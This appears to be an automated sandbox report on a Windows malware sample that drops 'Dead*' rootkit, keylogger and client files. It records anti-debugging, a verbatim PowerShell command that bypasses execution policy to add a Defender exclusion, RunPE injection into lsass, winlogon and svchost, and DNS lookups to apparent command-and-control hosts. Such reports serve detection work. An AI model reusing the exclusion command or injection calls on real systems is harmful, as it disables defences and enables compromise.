Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8078C1 CheckRemoteDebuggerPresent, 2_2_00007FFD9B8078C1
Checks if the current process is being debugged
Source: C:\Users\Public\DeadROOTkit.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A0981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_000002E86A0981B0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\DeadCodeRootKit.exe Code function: 3_2_00B019E2 StrCatW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrCatW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,RtlFreeHeap, 3_2_00B019E2
Enables debug privileges
Source: C:\Users\Public\DeadXClient.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\DeadROOTkit.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Public\Deadsvchost.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A098518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_000002E86A098518
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A0981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_000002E86A0981B0
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A09B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_000002E86A09B62C
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC6481B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00000225DC6481B0
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC64B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00000225DC64B62C
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC648518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00000225DC648518
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AEB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00000202C0AEB62C
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AE81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00000202C0AE81B0
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AE8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00000202C0AE8518
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A66130B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_000002A66130B62C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A661308518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_000002A661308518
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A6613081B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_000002A6613081B0
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF2181B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_000002BAAF2181B0
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF21B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_000002BAAF21B62C
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF218518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_000002BAAF218518
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879C8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_0000026A879C8518
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879CB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0000026A879CB62C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879C81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0000026A879C81B0
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537A81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00000179537A81B0
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537AB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00000179537AB62C
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537A8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00000179537A8518
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D56B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002295D56B62C
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D568518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_000002295D568518
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D5681B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002295D5681B0
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\svchost.exe Domain query: updates-full.gl.at.ply.gg
Source: C:\Windows\System32\svchost.exe Domain query: subscribe-bond.gl.at.ply.gg
Source: C:\Windows\System32\svchost.exe Domain query: api.telegram.org
.NET source code contains process injector
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 3.0.DeadCodeRootKit.exe.b040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 3.2.DeadCodeRootKit.exe.b040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 4.2.powershell.exe.11113b8b798.11.raw.unpack, RunPE.cs .Net Code: Run contains injection code
.NET source code references suspicious native API functions
Source: DeadXClient.exe.0.dr, Messages.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: DeadROOTkit.exe.0.dr, XLogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Adds a directory exclusion to Windows Defender
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe' Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\Public\DeadROOTkit.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_0000000140002430 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,OpenProcess,TerminateProcess, 6_2_0000000140002430
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AF1E2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B392AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 59042AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E72AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73162AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4E862AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 473C2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3F72AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A4152AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDF32AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C0262AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C9F32AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 645B2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7B2A2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4F62AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 2AB42AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25DA2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5352AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0D62AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFB2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C2572AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B942AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66932AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13EF2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27BC2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B4B2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BA2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 78742AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 641A2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60DB2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DA92AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C5AA2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F8FD2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F33D2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 48772AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2FB21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EAD62AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 86DD2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4DB12AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6F952AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10C21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10C21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F721CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2DC21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EC21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A521CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F321CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13E21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F021CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F321CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F721CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E221CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B721CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F221CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F721CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15B21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B621CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F421CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13521CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F221CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13121CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12721CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AA21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F221CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F421CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E721CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11521CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ED21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C221CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A421CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13821CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9021CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C021CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14C21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D021CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B421CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D021CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5121CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9E21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E321CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EA21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10B21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8721CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B921CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1A21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F021CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F121CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13921CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B021CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14721CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5C21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C521CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9121CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F421CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7921CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F521CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8C21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C521CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12121CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B21CF Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B412AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B9F2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 38862AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\conhost.exe EIP: 2F792AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Users\Public\Deadsvchost.exe EIP: 21B42AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\schtasks.exe EIP: 3BB52AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E00B2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 562AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 942AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11C2AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CEF02AB8 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CEF62AB8 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A Jump to behavior
